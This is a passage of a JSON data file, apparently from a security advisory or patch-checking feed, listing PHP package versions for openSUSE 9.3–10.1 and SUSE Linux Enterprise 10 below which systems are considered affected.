"operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-imap", "packageFilename": "php4-imap-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4", "packageFilename": "php4-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-gd", "packageFilename": "php4-gd-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-sysvshm", "packageFilename": "php4-sysvshm-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-session", "packageFilename": "php4-session-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-pear", "packageFilename": "php4-pear-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-gd", "packageFilename": "php5-gd-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-pgsql", "packageFilename": "php4-pgsql-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-curl", "packageFilename": "php4-curl-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-fastcgi", "packageFilename": "php4-fastcgi-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "mod_php4-servlet", "packageFilename": "mod_php4-servlet-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5", "packageFilename": "php5-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-exif", "packageFilename": "php4-exif-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-gd", "packageFilename": "php4-gd-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-dba", "packageFilename": "php5-dba-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5", "packageFilename": "php5-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-soap", "packageFilename": "php5-soap-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-gd", "packageFilename": "php4-gd-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-pear", "packageFilename": "php5-pear-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "apache2-mod_php4", "packageFilename": "apache2-mod_php4-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-exif", "packageFilename": "php5-exif-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-devel", "packageFilename": "php4-devel-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-exif", "packageFilename": "php5-exif-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "apache2-mod_php4", "packageFilename": "apache2-mod_php4-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4", "packageFilename": "php4-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-dba", "packageFilename": "php5-dba-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-unixODBC", "packageFilename": "php4-unixODBC-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-dom", "packageFilename": "php5-dom-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-session", "packageFilename": "php4-session-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-fastcgi", "packageFilename": "php4-fastcgi-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4", "packageFilename": "php4-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-sysvmsg", "packageFilename": "php5-sysvmsg-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-imap", "packageFilename": "php4-imap-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-mbstring", "packageFilename": "php4-mbstring-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "apache2-mod_php4", "packageFilename": "apache2-mod_php4-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-exif", "packageFilename": "php4-exif-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-gd", "packageFilename": "php5-gd-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": 